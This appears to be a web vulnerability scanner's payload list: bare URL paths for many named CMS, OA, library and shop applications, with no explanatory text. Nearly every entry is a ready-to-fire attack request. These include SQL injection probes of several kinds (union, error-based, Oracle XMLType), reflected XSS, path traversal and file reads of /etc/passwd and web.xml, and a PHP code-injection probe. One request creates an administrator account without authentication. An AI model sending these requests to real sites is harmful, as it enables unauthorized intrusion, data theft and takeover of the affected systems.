/cms/cms/infopub/gjjs.jsp?pubtype=S&pubpath=dkt&startdate=&enddate=&topic=&content=&authorname=&origin=&description=&webappcode=A02&searchdir=A02&templetid=-21'%20union%20all%20select%20char(106)%2bchar(62)%2bchar(60),null,null%20--
/mydocument/download.aspx
/prog/get_passwd_1.php?user=hehe%3Cscript%3Ealert(42873)%3C/script%3E%20
/cjwtlist.aspx?t=(select+convert(int%2c@@version))
/FormBuilder/PrintFormList.aspx?file_id=1)/**/UNION/**/ALL/**/SELECT/**/CHR(97)%7C%7CCHR(60)%7C%7CCHR(99),NULL/**/FROM/**/DUAL/**/--
/module/sitesearch/index.jsp?keyword=&columnid=-1650)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&keyvalue=&webid=&currpage=2
/FormBuilder/yjzxList.aspx?id=1/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,CHR(106)%7C%7CCHR(60)%7C%7CCHR(106)/**/FROM/**/DUAL--
/FromBaoShan/LaborSpecial/PlacardView.aspx?info_id=1/**/UNION/**/ALL/**/SELECT/**/CHR(106)%7C%7CCHR(106)%7C%7CCHR(106),NULL,NULL,NULL/**/FROM/**/DUAL--
/goods/GoodsAdd.aspx?goodsid=1/**/AND/**/1122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&flag=2
/pub/search/search_video_view.asp?id=3&mid=4%20and%201122=CONVERT(INT,(SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29))&yh=1
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/main/findgbm2.asp?sql=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name&sqlbak=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name%20&px=
/ebsys/fceform/common/djframe.htm?isfile=release&djsn=eb_runsql
/nameedit.asp?table=bbs&id=1%20union%20all%20select%20null,null,null,null,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),null%20--&action=edit
/jis/front/sdgs/updateuser.jsp
/lm/down.jsp?pathfile=down.jsp
/website/dflz/dflzCjAction!caiwugk_list.action?orgCode=&orgName=&zuOrgCode=&zuOrgName=&cwgkbbh=-21'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--%20&cwgkbmc=
/Documents/FolderInfor.asp?POAID=0'%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
/meetingroom/MeetingRoom_UseInfo.asp
/Documents/FolderInfor.asp?OAID=0%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
/lm/front/api/opr_datacall.jsp?fn_billstatus=E&vc_id=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL--
/downloadFile.action?path=index.jsp
/portal/getJsonData.action?userId=9090&ruleID=portal-common.getProFileInfo
/lm/front/noontimelist.jsp?flag=a&start=1&end=2&sysid=2'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL%20FROM%20DUAL%20--&groupid=4
/php/bill/print_addfeelog.php
/objectbox/selectx_userlist.jsp?fn_Keywords=1'%20UNION%20ALL%20SELECT%20NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL--%20&perm=&cPage=1&tiao=
/meetingroom/ShenQingInforDis.asp?OAID=-12%20AND%201993%20IN%20(char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100))%20---
/information/oa_infordislist.asp?class=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
/information/OA_Condition.asp?class=1&subclass=(CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))))---
/message/mytreedata.asp?bumenid=-12%20AND%201432=CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)))--%20&time=&time=
/house/upload/upload.asp
/sbweb/Upload_Save_2.asp
/feReport/chartList.jsp?delId=1&reportId=1%20and%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--
/jsearch/admin/opr_forcechangepwd.jsp
/home/front/search/opr_chatsearch.jsp?action=simplesearch&words=1%25%27%20union%20all%20select%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20DUAL%20--
/celive/live/index.php?action=1
/admin/Site/AddDomain.aspx?Edit=1&id=1000/**/%20/**/union/**/%20/**/all/**/%20/**//**/SELECT/**/%200,/**/CHAR(106)%2bCHAR(106)%2bCHAR(106),0,0,'',0,2014,0/**/FROM/**/%20ZL_Manager
/baseNews_view.jsp?newsId=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--
/Lesktop/command.aspx
/Lesktop/Management/DeptEdit.aspx?did=1%20and%20char(106)%3E0
/Lesktop/sendfile.aspx
/Office_Supplies/Goods_Main.aspx?type=1&info_id=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/Personnel/Infomation.aspx?userid=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/Personnel/VacationComputation.aspx?id=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/RCMANAGE_New/rcgl.aspx?UID=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/ObjSwitch/HYTZ.aspx?userid=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/modules/pdflist.aspx?info_id=1/**/union/**/all/**/select/**/null,null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),null,null,null/**/from/**/dual%20--
/jcms/m_5_e/init/sitesearch/opr_classajax.jsp?classid=1%20union%20all%20select%2012,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20from%20dual%20--
/lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,md5(1122),0x7e),NULL,NULL,NULL,NULL
/lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL%23
/jcms/jcms_files/jcms1/web2/site/module/comment/opr_readfile.jsp?filename=opr_readfile.jsp
/managerNManager.action
/lm/manage/opr_setappraisal.jsp?fn_billstatus=E&vc_setapprid=-2087%20UNION%20ALL%20SELECT%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL%20FROM%20DUAL--
/jcms/m_1_9/column/getgroupuser.jsp?jgid=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)%20--&spell=2&webid=3&userid=4
/lm/sys/opr_bulletin_show.jsp?vc_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
/lm/front/mailpublist.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl
/jcms/workflow/design/opr_model_class.jsp?fn_billstatus=E&vc_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100),NULL,NULL,NULL%20--
/jcms/m_5_5/m_5_5_1/objectbox/selectx_search.jsp?spell=1%25%27%20union%20all%20select%20null%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%20from%20dual%20--
/lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL%20--
/lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,0x7765627363616E3A693A66696E64,0x7e)%23
/lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl
/admini/question/question.aspx?ID=25'%20and%20char(106)%2bchar(106)%3E0%20--
/ModifyNewsAction.do?newsID=-12
/plugins/qmail/MailTo.aspx?mail=1%27and%02CHAR(106)%2bCHAR(39)%3E0%02and%02%271%27=%271
/manage/Template/DSManage.aspx
/index.php?id=product&c=project&cate=1&ext[id%3C0%20union%20select%20111,2,3,4,5,6,md5(1122),8,9%20,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--]=1
/api.php?id=_arclist&c=api&f=phpok&param[pid]=41&param[notin]=41)%20Union%20Select%201,md5(1122),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--%20
/admin/admin_adminmodifypwd.aspx
/jcms/m_5_6/ajax_printcol.jsp?cataid=1)%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)%20--
/feform/createprinttemplete.jsp?formid=1'%20AND%204321=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/fenc/syncsubject.jsp?pk_corp=1'%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/indexsearch/filter.jsp?tableId=1%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/Modules/jycg/SFDB.aspx?sfpjnm=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116),NULL%20--&type=1
/print/search_print_proof.jsp?proof_no=just_sql_test'
/include/user/mulbumentree.asp
/include/user/usertree.asp
/include/zidian/dantree.asp?ZiDian='%20AND%204321%3DCONVERT%28INT%2C%28SELECT%20CHAR%28106%29%2bCHAR%28117%29%2bCHAR%28115%29%2bCHAR%28116%29%2bCHAR%2895%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%28115%29%2bCHAR%28116%29%29%29%20--
/public/oa_nodebanliren_frm.asp
/include/chaxundetail.asp
/include/user/bdtreemx.asp
/admin/Fileup.aspx?path=notice/upload
/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20UNION%20SELECT%201,2,3,md5%281122%29,5,6,7,8,9%23
/inc/guestbook.php?do=guestbook&t=ajax&mid=1&content=testtesta%E9%8C%A6%27,(select%20concat%280x7c,md5%281122%29,0x7c%29from%20job_admin%20limit%201%29,NOW%28%29,1,1,3,1,if%281=2,1,char%28@%60%27%60%29%29%29%23@%60%27%60
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/hlp/help.asp?HlpCode=1'%20and%201=char(106)%20--
/Code/Common/SysCommonAttach.aspx?Method=GetNewID&IDs=isTrans&tabRecordId=1%27%20AND%201%3DCHAR%28106%29%20--
/ModifyNewsAction.do?newsID=-12'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%20%23
/piw/Site/KeyWordExport.jsp?ids=-111)%20union%20select%20Username,md5%281122%29,222,4444,5555%20from%20zduser%23
/schedule/Entrust.aspx?nidlist=0,1)/**/and/**/1=CHAR(106)%20--
/common/mod/ajax.ashx
/SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=-1'%20and%201=char(106)%20--
/dakai.aspx
/SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=3'%20and%201=char(106)%20--
/Permission/Application_Query_List.aspx?deptName=3'%20and%201=char(106)%20--
/main/model/childcatalog/zxzxinfo.jsp?MailId=13%20UNION%20ALL%20SELECT%20NULL,CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29,NULL,NULL,NULL,NULL,NULL,NULL%20--
/index_page/geren_list_page.aspx?server=1&refid=1'%20AND%201=CHAR(106)%2bCHAR(60)%20--
/website/level3.jsp?tablename=7&infoid=-1'%20UNION%20ALL%20SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29--
/varset/modifyTime.asp?varname=&id=495'%20union%20all%20select%201,2,3,0x66696E643A76756C,5,6,7,8,9%20from%20teachers%20--
/getpassword.php?do=login
/api/uc/uc.php?code=380dDbp0QmFDGmUR2ENTw7v%2B1YVER%2BKFyWB3YQN0OARXAr%2BIV4p1g3Ou5yA2CG6k%2BYdUOSb%2BwsiMwU4aqz2Gmtae60ut%2Fw
/servlet/FileDownload?filepath=c:/windows/win.ini&dispname=42873.txt
/servlet/FileDownload?filepath=/etc/passwd&dispname=42873.txt
/index.php?m=register&c=ajax_reg
/api/uc.php?code=8e347f1oWfxZ5isPSs7QBbA78aaJwxZCvdIIfY2niRLsrqrg0dHBfrkRSaOtzGxkncaWtRGPVKjVbHwZJSlI1JFH9WBN5wj%2Fsqj2Xg
/witapprovemanage/apprvaddNew.jsp?flowid=%27%20and%201=2%20UNION%20SELECT%201,2,3,4,char(106)%2bchar(60),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29;--%20-
/nicknamelogin.jsp
/jsearch/viewsnap.jsp?snapname=/../../../../../../../../../../../../../etc/passwd
/lm/objectbox/selectx_groupuserlist.jsp?vc_parid=-42873%27+or+%271%27=%271
/index.php?m=register&c=ajax_reg
/inc/ajax.asp?action=videoscore&id=1%20and%201=2%20union%20select%20CHR(106),CHR(99),3%20from%20%7Bpre%7Dmanager
/ajaxfs.php?tooltip=5254'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a);%20%23
/utilities.php?tail_lines=50&message_type=-1&go.x=10&go.y=9&refresh=20&reverse=1&filter=%22%3E%25%3Cscript%3Eprompt(42873)%3C/script%3E&page=1&action=view_logfile
/?q=node&destination=node
/UtilServlet?name=-1'%20UNION%20ALL%20SELECT%20NULL,%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)--%20&operation=getUserInfo&time=12
/jcms/m_5_e/module/individuation/opr_individuation_unit.jsp?fn_billstatus=B&sub_row=just_test
/govdiropen/jcms_files/jcms1/web1/site/zfxxgk/download/downannals.jsp?name=..././..././..././..././..././..././WEB-INF/ini/merpserver.ini&webid=1&type=1&downname=just_test.txt
/down.aspx?id=(select%20convert(int,(select%20char(106)))%20FROM%20syscolumns)
/api/CheckMemberLogin.ashx?type=mobileisexist
/comm/showpic.php?pic=aHR0cDovL3d3dy5zby5jb20vcm9ib3RzLnR4dA%3D%3D
/LoginCheck.aspx
/NodeProdCategory.aspx?action=GetChildNode&CategoryId=(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))
/index.php?c=api&m=data&auth=finecms&param=action%3Dcache%20name%3DSPACE-MODEL.1%27%5D%3Bprint%28md5%281122%29%29%3B%2f%2f
/Book/user_read.jsp?classId=1'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20and%20'at'='at
/show.jsp?id=5'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20AND%20'AT'='AT
/NTRdrS_RegistInfo.aspx?BookRecno=1'%20AND%209211=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20AND%20'AT'='AT
/NTRdrBookRetrInfo.aspx?BookRecno='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20chr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(58)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%20from%20DUAL))%7C%7C'
/NTRdrBookRetrInfo.aspx?BookRecno=18273&NewBIBNO=111%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)&NEWBOOK=newbook
/NTBookRetrTopShowright.aspx?page=1&Index=6&LocLmt=&SrchTab=3&Acurate=3&Key='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%20from%20DUAL))%7C%7C'&AllName=A++
/zfcgFrame/xx_look.aspx?ID=-1%27%20UNION%20ALL%20SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29--%20
/AdminP
/lm/front/reg_2.jsp?sysid=/../../WEB-INF/web.xml%00%23
/public/download.asp?filename=../login2.asp/
/Isv.ashx?action=addadmin&adminuser=admin&adminpassword=111111&guid=1
/index.php?controller=block&action=goodsCommend&id=0)%20Union%20select%201,md5(1122)%23
/API/DownloadProducts.ashx
/Brand.aspx?pageIndex=1&sortOrderBy=VistiCounts%20Desc)%20AS%20RowNumber%20FROM%20vw_Hishop_BrowseProductList%20p%20WHERE%20SaleStatus%20=%201)%20T%20WHERE%201=1%20and%201=char(106)%20--
/ProductUnSales.aspx?keywords=uio%2527&tagIds=1_2))%20T%20WHERE%201=1%20and%201=(select%20char(106)%2bchar(106))%20--%20&pageIndex=1
/SubCategory.aspx?TagIds=1%20and%20char(106)%3E1
/MShop/Partial/SuppLogo
/ShoppingHandler.aspx
/bq/Data/BIData.zip
/jphoto/objectbox/selectx_search.jsp?spell=1%25%27%20UNION%20SELECT%20CHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2899%29%7C%7CCHR%2899%29%2Cnull%20FROM%20DUAL%20--
/vc/vc/columncount/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
/jact/workflow/design/index.jsp?flowcode=a'%20UNION%20ALL%20SELECT%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(107)%7C%7CCHR(109)%7C%7CCHR(108),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
/jis/manage/role/opr_approleinfo_user2.jsp?c_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(101)%2bCHAR(102)%2bCHAR(58)%2bCHAR(104)%2bCHAR(103)%2bCHAR(58)%2bCHAR(105),NULL,NULL--%20
/cms/voteManager/voteaction.jsp
